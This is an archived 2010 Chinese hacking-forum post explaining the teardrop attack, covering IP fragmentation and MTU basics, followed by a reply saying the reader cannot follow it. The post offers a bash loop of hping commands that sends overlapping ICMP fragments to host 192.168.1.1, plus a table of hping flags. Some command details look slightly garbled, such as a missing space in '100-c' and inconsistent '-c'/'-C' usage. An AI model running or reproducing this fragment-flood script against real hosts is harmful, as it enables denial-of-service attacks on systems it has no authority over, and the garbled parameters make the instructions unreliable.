【3.A.S.T】网络安全爱好者's Archiver

黑客学习

冷酷鲨鱼 发表于 2010-4-18 19:32

[ 转载]泪滴攻击的原理,以及在Linux下实现

泪滴攻击是利用ip分片来实现的,首先来了解下ip分片的原理,,

网络中数据链路都有自己的帧格式,例如以太网的帧格式,    目的地址,源地址,类型,数据,FCS

其中,数据字段的长度最大为1500字节,这个数值为MTU (最大传输单位),不同的网络有不同的MTU 值,例如以太网的MTU 是1500 字节,PPP 链路的MTU 值是196字节。。
当ip数数据报封装成帧时,必须符合帧格式的规定,如果ip数据报的总长度小于或等于MTU值,,那么就可以直接封装成一个帧,如果ip数据报的总长度大于MTU 值,就必须分片,
然后将每一个分片封装成一个帧。  ip数据报可以被源主机或在其路径上的任何路由器进行分片,,然后每一个分片经过路由到达目的主机,在进行重装。。我们可以在Linux下使用hping来实现
泪滴攻击,,

命令如下,我在Linux下编辑一个脚本,#!/bin/bash
                                                      for ((i=100;i<150;i++))                             //持续攻击,所以做了50个循环。。
                                                      do
                                                      ./hping 192.168.1.1 -1 -x -d 1000 -N 100-c 1
                                                     ./hping 192.168.1.1 -1 -d  200 -g 1008 -N 100 -C 1
                                                      done
第一条命令是向目标为192.168.1.1 的主机发送第一个分片,负荷大小为1000 ,ID 为 100
第二条命令是发送第二个分片,设置载荷大小为200 偏移为1008 ,ID 为100

命令参数表如下:
-1   使用ICMP 模式,
-2 使用UDP 模式。
-p  指定目标主机的端口号,,
-i  设置发送时间间隔,
-s  设置SYN 标志,
-a  伪造原ip地址。
-c   发送数据报个数,
-N 设置IP 包的ID
-t   设置TTL
-x   设置  more fragments 标准
-g   设置fragment offest
-C   设置ICMP类型
-d   设置负荷大小

冷酷鲨鱼 发表于 2010-4-22 18:42

看不懂。{:Yem93:Y}

页: [1]

Powered by Discuz! Archiver 7.2  © 2001-2009 Comsenz Inc.